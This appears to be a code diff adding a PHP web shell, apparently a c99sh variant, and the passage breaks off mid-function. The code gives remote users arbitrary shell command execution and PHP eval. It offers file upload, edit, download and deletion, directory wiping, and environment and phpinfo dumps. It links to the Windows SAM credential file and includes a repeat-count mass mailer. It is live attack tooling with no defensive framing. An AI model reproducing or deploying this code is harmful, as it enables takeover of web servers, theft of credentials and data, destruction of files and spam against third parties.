+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+ @ob_clean();
+//end
+if (isset($_GET['img'])) {
+   for ($i=0;$i<4;$i++) {
+     if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
+    header("Content-type: ".$inf["mime"]);
+    readfile(urldecode($filename));
+    exit;
+
+     }
+ }
+}
+
+
+if (!function_exists(download)) {
+   function download($file) {
+   header('Pragma: anytextexeptno-cache', true);
+      header('Content-type: application/force-download');
+          header('Content-Transfer-Encoding: Binary');
+              header('Content-length: '.filesize($file));
+                  header('Content-disposition: attachment;
+                      filename='.basename($file));
+                          readfile($file);
+                          exit;
+   }
+}
+if (isset($_GET['download'])) {
+download($filename);
+exit;
+}
+
+if (isset($_GET['run'])) {
+echo urldecode($_GET['file']);
+include(urldecode($_GET['file']));
+exit;
+}
+
+
+function check_update() 
+{
+$cur_ver=5; //very important value for updates!Please dont change!
+$newer=$cur_ver+1;
+$url="http://dc3.dl.am/";
+$file=@fopen($url."".$newer.".txt","r") or die ("No updates aviable!");
+$text=fread($file,1000000);
+if (preg_match("/ver=".$newer."/i", $text)) {
+   echo "[+]Update Aviable!...Please download new version from:";
+echo "<br><a href=".$url.$newer.".txt>Version ".$newer."</a>";
+} }
+
+function get_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+echo  $type.join("",$owner).join("",$group).join("",$world);
+}
+
+
+
+if (!function_exists(get_space)) {
+   function get_space($dir) {
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_f = @round(48.7/($all/$free),2);
+echo "".$used_f."";
+     }
+ }
+$sys=strtolower(substr(PHP_OS,0,3));
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+echo "<img  src=".$surl."?&".$word."&dir&pic=o.b height= width=>";
+echo getenv('SERVER_SOFTWARE');
+echo "<br>";
+echo getenv('SERVER_NAME');
+echo ":";
+echo getenv('SERVER_PORT');
+echo "<br>";
+echo getenv('SERVER_ADMIN');
+
+if ($sys=="win") {
+echo "Windows";
+echo "<br>";
+echo  "".getenv('COMPUTERNAME')."";
+echo "<br>";
+echo "Os:".getenv('OS')."";
+} else {
+echo "<br>Linux";
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+$safe=1;
+echo "<br><font color=red>ON (secure)</font>";
+ } else {
+$save=2;
+if ($sys=="win") {
+echo "<br><font color=green><a href=".$surl."?&".$word."&file_browser&file=C:/Windows/repair/sam&download>Off (not secure)</a></font>";
+}
+}
+if (isset($_GET['file']))  {
+echo "<br>Access:";
+if (@is_readable($j_f)) {
+   echo "R";
+}
+if (@is_executable($j_f)) {
+ echo "E";
+}
+if (@is_writable($j_d)) {
+echo "W";
+}
+echo "<br>Current_file:";
+echo "<a href=".$surl."?&".$word."&file_browser&file=";
+echo urlencode($p) ;
+echo ">".$p."</a>";
+ }
+echo "<br>";
+echo "Start_dir:";
+echo "&ensp;&ensp;&ensp;";
+echo "<a href=".$surl."?&".$word."&file_browser&file=";
+echo urlencode($ps);
+echo ">".$ps."</a>";
+echo "<br>";
+if (isset($_GET['file'])) {
+echo "Free Space:";
+get_space(urldecode($_GET['file']));
+
+echo "gb";
+}
+echo "</td>";
+?>
+
+<style type="text/css">
+body { background-color:#8B8989;font-family:trebuchet Ms; color:black }
+
+textarea {
+border-top-width: 1px; 
+font-weight: bold; 
+border-left-width: 1px; 
+font-size: 10px; 
+border-left-color: #8B8989; 
+background:#8B8989; 
+border-bottom-width: 1px; 
+border-bottom-color:#8B8989; 
+color: black; 
+border-top-color:#8B8989; 
+font-family: trebuchet Ms; 
+border-right-width: 1px; 
+border-right-color: #8B8989;
+}
+input {
+border-top-width: 1px; 
+font-weight: bold; 
+border-left-width: 1px; 
+font-size: 10px; 
+border-left-color: #8B8989; 
+background: #8B8989; 
+border-bottom-width: 1px; 
+border-bottom-color: #8B8989; 
+color: black; 
+border-top-color:#8B8989; 
+font-family: trebuchet Ms; 
+border-right-width: 1px; 
+border-right-color:#8B8989;
+}
+td {
+    font-size: 10px; 
+    font-family: verdana;
+}
+th {
+    font-size: 10px; 
+    font-family: verdana;
+}
+a:link {
+    text-decoration: none;
+}
+a:visited {
+    text-decoration: none;
+        color:blue;
+}
+a:active {
+    text-decoration: none;
+}
+a:hover {
+    color: #00ff00; 
+    text-decoration: none;
+}
+back {
+background-color:grey;
+}
+ ul#Navigation {
+position:absolute;
+    width: 10em;
+    margin: 0; padding: 0.8em;
+    border: 1px solid #8B8989;
+    background-color: #8B8989;
+  }
+  * html ul#Navigation {  /* Korrekturen fuer IE 5.x */
+    width: 11.6em;
+    w\idth: 10em;
+    padding-left: 0;
+    padd\ing-left: 0.8em;
+  }
+  ul#Navigation li {
+    list-style: none;
+    margin: 0.4em; padding: 0;
+  }
+
+  ul#Navigation a {
+    display:block;
+    padding: 0.2em;
+    text-decoration: none; font-weight: bold;
+    border: 1px solid black;
+    border-left-color: black; border-top-color: black;
+    color: black; background-color: #8B8989;
+  }
+  * html ul#Navigation a {  /* Breitenangaben nur fuer IE */
+    width: 100%;
+    w\idth: 8.8em;
+  }
+  ul#Navigation a:hover {
+    border-color: white;
+    border-left-color: black; border-top-color: black;
+    color: white; background-color: #8B8989;
+  }
+</style>
+
+<?php
+if (!function_exists(rename_all)) {
+    function rename_all($dir,$prefix,$name,$del) {
+     $r_dir=opendir($dir);
+       while (false !== ($file_r = readdir($r_dir))) {
+         if (@filetype($dir."/".$file_r)=="file") {
+           $i++;
+        @copy($dir."/".$file_r,$dir."/".$i.".".$prefix.$name) or die ("[-]Error renaming file : ".$file_r."");
+         if ($del=="yes") {
+          @unlink($dir."/".$file_r) or die ("[-]Error deleting file(s)!");
+        }
+       }
+       
+      }
+       echo "Successfully renamed file(s)!";
+    }
+  }
+        
+        
+
+if (!function_exists(get_perms)) {
+     function get_perms($file) {
+    if (@file_exists($file)) {
+      if (@is_readable($file)) {
+        echo "<b>R</b>";
+         }
+           if (@is_executable($file)) {
+            echo "<b>E</b>";
+             }
+               if (@is_writable($file)) {
+                echo "<b>W</b>";
+                }
+              } else {
+                 echo "[-]Error";
+               }
+            }
+          }
+
+if (!function_exists(search_file)) {
+   function search_file($search,$dir) {
+    global $word;
+     global $surl;
+    $d_s=opendir($dir);
+    while (false !== ($file_s = readdir($d_s))) {
+      if (preg_match("/".$search."/i",$file_s))   {
+         echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($dir)."/".urlencode($file_s).">".$file_s."</a><br>";
+         }
+       }
+     }
+   }
+
+
+if (!function_exists(copy_file)) {
+    function copy_file($file,$to) {
+   if (@file_exists($file)) {
+     @copy($file,$to) or die ("[-]Error copying file!");
+      echo "Successfully copied file!";
+       } else {
+           echo "[-]File Doesnt exist!";
+       }
+    }
+ }
+
+if (!function_exists(send_mail)) {
+   function send_mail($from,$to,$text,$subject,$times) {
+              while ($i<$times) {
+               $i++;
+               $header  = "From: $from\r\n";    
+                @mail($to, $subject, $text, $header) or die ("[-]Error sending mail(s)!");
+
+              }
+                   echo "Successfully sent mail(s) to ".$to."!";
+   }
+ }
+
+
+if (!function_exists(read_file)) {
+   function read_file($file) {
+$file=@fopen($file,"r");
+echo fread($file,10000);
+fclose($file);
+       }
+     }
+
+if (!function_exists(write_file)) {
+   function write_file($file,$text) {
+     if (@is_writable($file)) {
+      if (@file_exists($file)) {
+        $file_w=@fopen(urldecode($file),"w") or die ("[-]Error");
+         if (fwrite($file_w,$text)) {
+            echo "Successfully written to file(s)!";
+          }
+        }
+     }
+           else {
+           echo "[-]Error";
+            exit;
+     }
+   }
+ }
+      
+
+
+if (!function_exists(count_all)) {
+     function count_all($dir) {
+       $c_d=opendir($dir);
+        while (false !== ($file_c = readdir($c_d))) {
+         if (@filetype($dir."/".$file_c)=="file") {
+            $file_c_s++;
+         } 
+           else 
+         { 
+            $dir_c++;
+         }
+        }
+       echo "Directories:";
+        echo $dir_c++;
+         echo "||";
+          echo "Files:";
+            echo $file_c_s;
+     }
+}
+
+if (!function_exists(check_access)) {
+   function check_access($file) {
+     if (@is_readable($file)) {
+       echo "R";
+        }
+         if (@is_executable($file)) {
+           echo "E";
+             } 
+              if (@is_writable($file)) {
+                echo "W"; 
+                 }
+              } 
+           }
+
+if (!function_exists(clear_dir)) {
+   function clear_dir($dir) {
+$o_d=opendir($dir);
+   while (false !== ($file = readdir($o_d))) {
+    if (@filetype(urldecode($_GET['file'])."/".$file)=="file") {
+unlink(urldecode($dir)."/".$file) or die ("[-]Error @ file:".$file."");
+   }
+ }
+echo "Successfully cleared directory!";
+   }
+ }
+
+?>
+
+
+<?php
+// real code start !
+
+
+if (isset($_GET['update'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+check_update();
+exit;
+}
+if (isset($_GET['rmdir']))  {
+echo "<center><table border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+@rmdir($_GET['file']) or die ("[-]Error deleting dir!");
+echo "Successfully deleted dir(s)!";
+exit;
+}
+
+
+if (isset($_GET['upload'])) {
+$uploaddir = urldecode($_POST['file']);
+
+print "<pre>";
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir ."/". $_FILES['userfile']['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+   print "Successfully uploadet file(s)!";
+} else {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+   print "[-]Error";
+}
+exit;
+}
+
+if (isset($_GET['search'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+
+    <tr><td>";
+search_file($_POST['search'],urldecode($_POST['dir']));
+exit;
+}
+
+
+
+
+if (isset($_GET['getenv'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo getenv($_GET['getenv']);
+exit;
+}
+
+
+if (isset($_GET['php_info'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+phpinfo();
+exit;
+}
+
+if (isset($_GET['defined_vars'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo "<center><textarea rows=40 cols=120>";
+$vars=get_defined_vars();
+print_r($vars);
+echo "</textarea>";
+
+exit;
+}
+
+if (isset($_GET['env'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead><br>
+    <tr><td>";
+$ary=get_defined_vars();
+$it=array_keys($ary);
+foreach ($it as $i) {
+echo "<a href=".$surl."?&".$word."&getenv=".$i.">".$i."</a><br>";
+
+}
+exit;
+}
+
+if (isset($_GET['play'])) {
+echo "<embed src=".urlencode($filename)." autostart=true loop=true hidden=true height=0 width=0>";
+exit;
+}
+
+
+if (isset($_GET['special_crypt'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo "<textarea rows=15 cols=90>";
+if (isset($_POST['submit'])) {
+$file=@fopen($_FILES['userfile']['tmp_name'],"r") or die ("[-]Error reading file!");
+$meth=$_POST['crypt'];
+if ($meth=="1") {
+echo htmlspecialchars(md5(fread($file,10000)));
+ } elseif ($meth=="2") {
+      echo htmlspecialchars(crypt(fread($file,10000)));
+}
+    elseif ($meth=="3") {
+     echo htmlspecialchars(sha1(fread($file,10000)));
+  }
+elseif ($meth=="4") {
+     echo htmlspecialchars(crc32(fread($file,10000)));
+}
+   elseif ($meth=="5") {
+     echo htmlspecialchars(urlencode(fread($file,10000)));
+}
+
+   elseif ($meth=="6") {
+     echo htmlspecialchars(urldecode(fread($file,10000)));
+}
+   elseif ($meth=="7") {
+     echo htmlspecialchars(base64_encode(fread($file,10000)));
+}
+
+elseif ($meth=="8") {
+     echo htmlspecialchars(base64_decode(fread($file,10000)));
+}
+
+}
+echo "</textarea><div align=left>";
+
+?>
+<form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&special_crypt method="post">
+file: <input name="userfile" type="file"><br><br>
+
+<input type="submit" value="Start" name="submit"><br>
+<input type=radio name=crypt value=1>md5();<br>
+<input type=radio name=crypt value=2>crypt();<br>
+<input type=radio name=crypt value=3>sha1();<br>
+<input type=radio name=crypt value=4>crc32();<br>
+<input type=radio name=crypt value=5>urlencode();<br>
+<input type=radio name=crypt value=6>urldecode();<br>
+<input type=radio name=crypt value=7>base64_encode();<br>
+<input type=radio name=crypt value=5>base64_decode();<br>
+
+<?php
+exit;
+}
+if (isset($_GET['crypt'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&crypt method="post">
+Crypt:<br>
+<textarea rows=12 cols=120 name=crypt>
+</textarea>
+<?php
+$text=$_POST['crypt'];
+?>
+md5:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(md5($text)) ?>><br><br>
+
+crypt:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(crypt($text)) ?>><br><br>
+
+sha1:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(sha1($text)) ?>><br><br>
+
+crc32:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(crc32($text)) ?>><br><br>
+
+urlencode:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo  htmlspecialchars(urlencode($text)) ?>><br><br>
+
+urldecode:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(urldecode($text)) ?>><br><br>
+
+base64_encode:&ensp;<input type=text size=40 value=<?php echo base64_encode($text) ?>><br><br>
+
+base64_decode:&ensp;<input type=text size=40 value=<?php echo base64_decode($text) ?>><br><br>
+<?php
+echo "<input type=submit value=Start></form><form action=".$surl."?&".$word."&special_crypt method=post><input type=submit value=file_inload_crypt>";
+exit;
+}
+
+if (isset($_GET['php_code'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&php_code method="post">
+
+<textarea rows=12 cols=120 name=code>
+</textarea>
+<textarea rows=12 cols=120 readonly>
+<?php
+eval($_POST['code']);
+echo "</textarea>";
+echo "<br><br><input type=submit value=Start>";
+exit;
+}
+
+if (isset($_GET['search_st'])) {
+   if (isset($_POST['search'])) {
+search_file($_POST['search'],$_POST['dir']);
+ }
+exit;
+}
+
+
+if (isset($_GET['rename_all'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+rename_all(urldecode($_POST['d']),$_POST['prefix'],$_POST['name'],$_POST['del']);
+exit;
+}
+
+if (isset($_GET['special_d'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+ $way=$_POST['way'];
+   if ($way=="1") {
+clear_dir($_GET['file']);
+   exit;
+  }
+    if ($way=="2") {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&rename_all method="post">
+Prefix:<br><input type="text" name="prefix"><br>
+Name:<br><input type="text" name="name"><br>
+<input type="hidden" name="d" value=<?php echo urlencode($filename) ?>>
+Delete old files?:<input type="radio" name="del" value="yes"><br>
+<br><input type="submit" value="Rename">
+<?php
+exit;
+}
+}
+
+
+if (isset($_GET['special_dir'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&special_d&file=<?php echo urlencode($filename) ?> method=post>
+<input type="radio" name="way" value="1">Clear Dir<input type=hidden name=dir value=<?php echo urlencode($filename) ?>><br><br>
+<input type="radio" name="way" value="2">Rename with prefix<br><br>
+<input type="submit" name="sub" value="Start">
+<?php
+exit;
+}
+
+if (isset($_GET['delete'])) {
+   if (@file_exists($filename)) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+    @unlink($filename) or die ("[-]Error deleting file!");
+     echo "Successfully Deleted File!";
+      exit;
+   }
+}
+
+if (isset($_GET['save'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+     write_file(urldecode($_POST['file']),stripslashes($_POST['text']));
+   
+   exit;
+}
+
+if (isset($_GET['exec'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td><center>";
+@chdir(urldecode($_POST['dir']));
+echo "<textarea rows=15 cols=114>";
+echo shell_exec($_POST['command']);
+echo "</textarea>";
+exit;
+}
+
+
+if (isset($_GET['mkdir'])) {
+   if (isset($_POST['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+     mkdir(urldecode($_POST['dir'])."/".$_POST['name']) or die ("[-]Error creating dir!");
+     echo "Successfully created dir!";
+   }
+exit;
+}
+
+if (isset($_GET['mkfile'])) {
+   if (isset($_POST['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+$dir=urldecode($_POST['dir']);
+$filed=$_POST['name'];
+
+       if (@file_exists($dir."/".$filed)) {
+     echo "[-]Allready exists!";
+      exit;
+     }
+    $file_c=@fopen($dir."/".$filed,"w") or die ("[-]Can't create file!");
+     echo "Scuessfully created file(s)!";
+   }
+exit;
+}
+
+if (isset($_GET['edit'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+   if (@file_exists($filename)) {
+     echo "<form action=".$surl."?&".$word."&save method=post><textarea rows=15 cols=90 name=text>";
+      read_file($filename);
+       echo "</textarea><br><br><input type=hidden name=file value=".urlencode($_GET['file'])."><input type=submit name=sub value=Save>";
+       }
+    exit;
+}
+
+
+
+if (isset($_GET['copy_start'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+copy_file($_POST['from'],$_POST['to']);
+exit;
+}
+
+
+
+if (isset($_GET['copy_file']))  {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&copy_start method="post">
+New:<br><textarea rows=4 cols=70 name="to"><?php echo realpath($filename) ?></textarea><br><br>
+Old:<br><textarea rows=4 cols=70 name="from"><?php echo realpath($filename) ?></textarea><br><br>
+<input type="submit" name="sub" value="Copy">
+<?php
+exit;
+}
+
+if (isset($_GET['send_mail_st'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+
+    <tr><td>";
+if (isset($_POST['from'])) 
+{
+if (isset($_POST['to'])) 
+{
+if (isset($_POST['text'])) 
+{
+if (isset($_POST['subject']))
+{
+if (isset($_POST['times']))
+{
+send_mail($_POST['from'],$_POST['to'],$_POST['text'],$_POST['subject'],$_POST['times'])  ; 
+exit;
+}
+}
+}
+}
+}
+}
+if (isset($_GET['send_mail'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&send_mail_st method="post">
+From:&ensp;&ensp;&ensp;&ensp;<input type="text" name="from"><br><br>
+To:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="text" name="to"><br><br>
+Subject:&ensp;&ensp;<input type="text" name="subject"><br><br>
+Times:&ensp;&ensp;&ensp;<input type="text" name="times"><br><br>
+
+Text:<br><textarea rows=15 cols=60 name="text"></textarea><br><br>
+<input type="submit" name="sub" value="Send!">
+<?php
+exit;
+}
+if (isset($_GET['file_browser'])) {
+
+   for ($i=0;$i<4;$i++) {
+     if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+     echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($filename)."&img><img src='".urldecode($surl)."?&".$word."&file=".urldecode($filename)."&img' height= width= border=0><br>";
+  exit;
+}  }
+
+
+
+if (@filetype($j_f)=="file") {
+echo "<center><table border=\"1\" rules=\"groups\" 
+  <thead>
+    <tr><td>";
+highlight_file($j_f);
+
+exit;
+}
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+
+      <th></th><td>";
+count_all($j_d);
+echo "</tr>";
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+      <th>Filename</th><th>Edit</th><th>Copy</th><th>Download</th><th>Delete<th>Perms</th><th>Access</th> ";
+
+
+
+
+$o_d=opendir($j_d);
+
+
+
+   while (false !== ($file = readdir($o_d))) {
+     echo " <tbody>
+
+    <tr>
+      <td>";
+if (@filetype($j_d."/".$file)=="dir") {
+echo "</a><img  src=".$surl."?&".$word."&dir&pic=dir height=12 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[".$file."]";
+} else {
+echo "<img  src=".$surl."?&".$word."&dir&pic=ext_wri height=9 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+echo $file;
+}
+echo "<br></a></td><td><a href=".$surl."&".$word."&edit&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Edit]";
+}
+else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&copy_file&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Copy]";
+} else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&download&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Download]";
+} else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&delete&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Delete]";
+} else {
+echo "</a><center><a href=".$surl."&".$word."&rmdir&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[Delete]</a>";
+} 
+echo "<td><center>";
+echo @fileowner($j_f."/".$file);
+echo "</td>";
+echo "<td><center>";
+get_perms(fileperms($j_f."/".$file));
+echo "</td>";
+echo "</a></td>";
+ }
+echo "<center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&upload method="post">
+file: &ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input name="userfile" type="file">
+<input type="hidden" name="file" value=<?php echo urlencode($_GET['file']) ?>>
+<input type="submit" value="Upload"><br><br><?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+?>
+</form>
+
+<?php
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&search method="post">
+search: &ensp;&ensp;&ensp;&ensp;<input name="search" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="Search">
+</form>
+<?php
+
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+  <thead>
+
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&mkdir method="post">
+name: &ensp;&ensp;&ensp;&ensp;&ensp;<input name="name" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="mkdir">
+</form>
+<?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&mkfile method="post">
+name:&ensp;&ensp;&ensp;&ensp;&ensp; <input name="name" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="mkfile">
+</form>
+<?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&exec method="post">
+command: <input name="command" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="execute">
+</form>
+<?php
+echo "</td><center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+
+      <th></th><td><a href=".$surl."?&".$word."&special_dir&file=".urlencode($filename).">Special DirOptions</a></td> ";
+echo "</a>";
+exit;
+  }
+?>
+
+
+
+<html>
+  <ul id="Navigation">
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&file_browser&file=<?php echo  "." ?>>File_Browser</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&send_mail>Send Mail(s)</a></li>
+
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_code>php_code</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&crypt>crypter</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_info>php_info()</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&defined_vars>defined_vars()</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&env>env()</a></li>
+
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&update>update()</a></li>
+  </ul>
+<center><table border="1" rules="groups">
+  <thead>
+    <tr>
+     <th></th>
+       <td>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&exec_st method="post">
+
+<input type="submit" name="sub" value="Execute"><br>
+<br>
+<input type="text" name="command">
+<br>
+<input type="radio" name="method" value="1">shell_exec();
+<input type="radio" name="method" value="2">system();
+<input type="radio" name="method" value="3">passthru();
+<input type="radio" name="method" value="4">automatic();<br>
+<textarea name="exec" rows=15 cols=90>
+<?php
+if (isset($_GET['exec_st'])) {
+    $meth=$_POST['method'];
+      $com=$_POST['command'];
+        if (isset($meth)) {
+          if ($meth=="1") {
+            echo shell_exec($com);
+              }
+               elseif($meth=="2") {
+                 echo system($com); 
+                   }
+                  elseif ($meth=="3") {
+                    passthru($com);
+                     }
+                       elseif ($meth=="4") {
